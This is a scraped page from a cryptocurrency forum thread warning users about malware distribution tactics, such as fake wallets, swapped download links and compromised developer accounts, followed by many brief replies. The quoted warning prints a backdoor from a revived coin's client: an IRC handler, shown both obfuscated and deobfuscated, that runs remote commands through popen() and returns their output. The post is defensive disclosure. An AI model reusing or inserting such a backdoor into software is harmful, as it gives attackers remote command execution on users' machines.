Thanks for the information ...
But can you please give us the exact name of the coins ... Thank you !!!
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 18. (Read 837452 times)
April 09, 2018, 06:36:36 AM
April 08, 2018, 04:02:19 PM
Hello) At me the first purse has been cracked and now I am very cautious ... Has installed a firewall, whether it will help to protect savings ...?
April 07, 2018, 04:30:40 AM
Thanks this was very informative. and inform to us..
April 07, 2018, 02:34:26 AM
Information so useful that we can secure the wallet from the virus that will cause a big problem later therefore should be able to find the right solution to prevent it by making good security 
April 06, 2018, 07:18:16 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
Thanks for posting this. There is always something that we have to look out for.
April 05, 2018, 10:22:06 PM
Very interesting read! Thanks!
April 05, 2018, 01:33:31 PM
Wow! Thanks for the info! Excellent data! Carefully study this subject, and I take my notes!
April 04, 2018, 02:09:51 AM
Yea, be carefull what are you opening. I had problem once hardly i fixed it. This malware infections are very dangerous. Every miner should know that.
April 03, 2018, 09:52:06 PM
Malicious software or “malware” for short is a broad class of software built with malicious intent. To identify i will tell you how.A newbie asks for the latest wallet, or wallet that doesn’t have any TX fees, or the latest/fastest miner, and the attacker posts a program with malware embedded as a response. This type of attempt usually gets spotted pretty quickly.The attacker creates a new ANN topic and posts a malware link as the download file (or a legit one and changes it to a malware one later).The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.Those were just an examples of how they used it. So think before acting.
April 03, 2018, 06:43:32 PM
It does seem to get worse.
But, the best thing you can do to start with in protecting your funds, is getting yourself a hardware wallet and storing tokens there. Avoid online wallets like MEW.
But, the best thing you can do to start with in protecting your funds, is getting yourself a hardware wallet and storing tokens there. Avoid online wallets like MEW.
April 03, 2018, 06:31:16 PM
On the computer must be an antivirus, look at where you enter your data and passwords. In general, you need to be careful with the data
April 02, 2018, 09:08:41 PM
Still there scam in crypto guys?? Whats it like could you please post that website that possible for scam?? So i can i aware
April 01, 2018, 12:08:29 PM
Thank you for posting this. Hope others would be informed and stay vigilant. Stay safe everyone.
April 01, 2018, 01:01:45 AM
Thank you for the insightful information. I believe malware developers have this kind of platform as a target for obvious and selfish reasons.
March 31, 2018, 12:33:04 PM
Thank you for that😊😊
Please more more secure to our system !! So no one can hack or key ligger can enter this forum😇😇😊
Please more more secure to our system !! So no one can hack or key ligger can enter this forum😇😇😊
March 31, 2018, 05:15:52 AM
I think its very terrible incident for us.Malware is one of the most useless virus.It generally killed our phone and hacked our all privacy by a group. Actually,we work hard for our own development but this group haked this within a minutes like a vampire's eating.This work done by some indolence people who are interests to earn money dishonestly. For these all things,everyone should be aware of sophisticated Malware infection attempts
March 31, 2018, 04:07:41 AM
Will you post whos this user or web can have ah key logger so i can warn my friends??
March 30, 2018, 02:08:04 PM
Yea, be carefull what are you opening. I had problem once hardly i fixed it. This malware infections are very dangerous. Every miner should know that.
yes March 30, 2018, 10:42:58 AM
Thank you very much! this was very informative. stay safe.
March 29, 2018, 12:33:55 PM
I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.
It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.
It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.
My god, this is just targeting at the greed of people. Always be wary of such a low blow
Jump to: